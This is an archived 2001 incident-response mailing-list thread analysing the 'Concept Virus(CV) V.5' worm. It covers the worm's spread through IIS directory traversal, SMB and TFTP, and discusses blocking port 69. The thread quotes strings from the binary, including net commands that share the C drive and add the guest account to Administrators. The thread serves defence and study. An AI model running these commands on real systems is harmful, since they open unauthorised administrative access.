Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Concept Virus(CV) V.5 - Advisory and Quick analysis

From: "Davis, Matt" <matt.davis () countryfinancial com>
Date: Wed, 19 Sep 2001 07:01:46 -0500
It uses TFTP to try to pull the admin.dll file from the 'attacking' system.

The default port for TFTP is 69, AFAIK.

Regards,
Matt

--
Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services
309-821-6288
mailto:matt.davis () countryfinancial com



-----Original Message-----
From: Robert Nieuwhof [mailto:RNieuwhof () nos com]
Sent: Tuesday, September 18, 2001 4:01 PM
To: 'Dave Sill'; Grady Fox
Cc: incidents () securityfocus com
Subject: RE: Concept Virus(CV) V.5 - Advisory and Quick analysis


Have you indeed confirmed that the worm utilizes port 69? If 
so, how was
this confirmed and will you please share the criteria and 
results of your
confirmational testing?

Thanks,
Robert J. Nieuwhof, CNA, MCP
mailto:Rnieuwhof () nos com
Network Engineer
NOS Communications - Information Services

http://www.nos.com

Madness takes its toll. Please have exact change. 

The information contained in this correspondence is confidential and
intended for the use of the individual or entity named above. 
Unauthorized
distribution is prohibited. Any and all opinions expressed,  are the
opinions of the author of this e-mail, and in no way reflect 
or imply the
opinions of NOS Communications.


-----Original Message-----
From: Dave Sill [mailto:davids () socket net]
Sent: Tuesday, September 18, 2001 11:13 AM
To: Grady Fox
Cc: incidents () securityfocus com
Subject: Re: Concept Virus(CV) V.5 - Advisory and Quick analysis


We've blocked 69/udp at our internal and border routers both 
incoming and 
outgoing.  Be careful with your private networks.  Our tech support 
department contracted this bug by opening a web page of an 
infected customer

in response to a complaint about performance.

Dave Sill
Server Admin
Socket Internet Services
davids () socket net

On Tuesday 18 September 2001 15:10, you wrote:

YES

--- Dave Sill <davids () socket net> wrote:

You say that the worm gets a payload by tftp...  Is
it using port 69?

Thanks,

Dave Sill
Server Admin
Socket Internet Services
davids () socket net

Is the worm

On Tuesday 18 September 2001 10:47, you wrote:

Hi all!


We've all just been hit by a VERY aggressive


worm/virus.


Quick analysis indicates that it propagates itself


in


a number of different ways:

Through use of IIS UNICODE direcory traversal


coupled


with the recent IIS .dll privilege escalation


attack.


It uses SMB/CIFS and TFTP to get the worm payload.

Through MAPI mails (probably to all of


addressbook).


Other ways of spreading may be possible, but we


haven't


yet had the time to properly analyse the


worm/virus.


It seems to share "c:\" via SMB/CIFS as "c$" and
the worm/virus also adds the "Guest" user and


"Guests"


group to the local "Administrators" group....


Interesting strings in binary:

Concept Virus(CV) V.5, Copyright(C)2001  R.P.China


SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security


share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
net


More info as we come upon it.....

/olle




---------------------------------------------------------------
------------



- This list is provided by the SecurityFocus ARIS


analyzer service.


For more information on this free incident


handling, management


and tracking system please see:


http://aris.securityfocus.com




---------------------------------------------------------------
------------

-


This list is provided by the SecurityFocus ARIS
analyzer service.
For more information on this free incident handling,
management
and tracking system please see:
http://aris.securityfocus.com


__________________________________________________
Terrorist Attacks on U.S. - How can you help?
Donate cash, emergency relief information
http://dailynews.yahoo.com/fc/US/Emergency_Information/


---------------------------------------------------------------
-------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com



[INFO] -- Virus Manager:
This email message and any attachments have been scanned for 
viruses and are
believed to be free of any virus.


This email, including any attached files, is confidential and 
is for the sole use of the individual or entity for whom it is 
intended.  This email represents the originator's personal 
views and opinions, which do not necessarily reflect those of 
this Company.  If you are not the intended recipient of this 
email, be advised that you have received this email in error.  
Any use, dissemination, forwarding, printing, or copying of 
this email is strictly prohibited and may be subject to legal 
sanction.  If you have received this email in error, please 
immediately notify postmaster () sitehelp org .

This email and any attachments have been scanned for viruses 
and are believed to be free of any virus or defect that might 
affect any computer system into which it is received.  
However, it is the responsibility of the recipient to ensure 
that it is virus free and no responsibility or liability is 
accepted by this Company for loss or damage arising from its use.





---------------------------------------------------------------
-------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: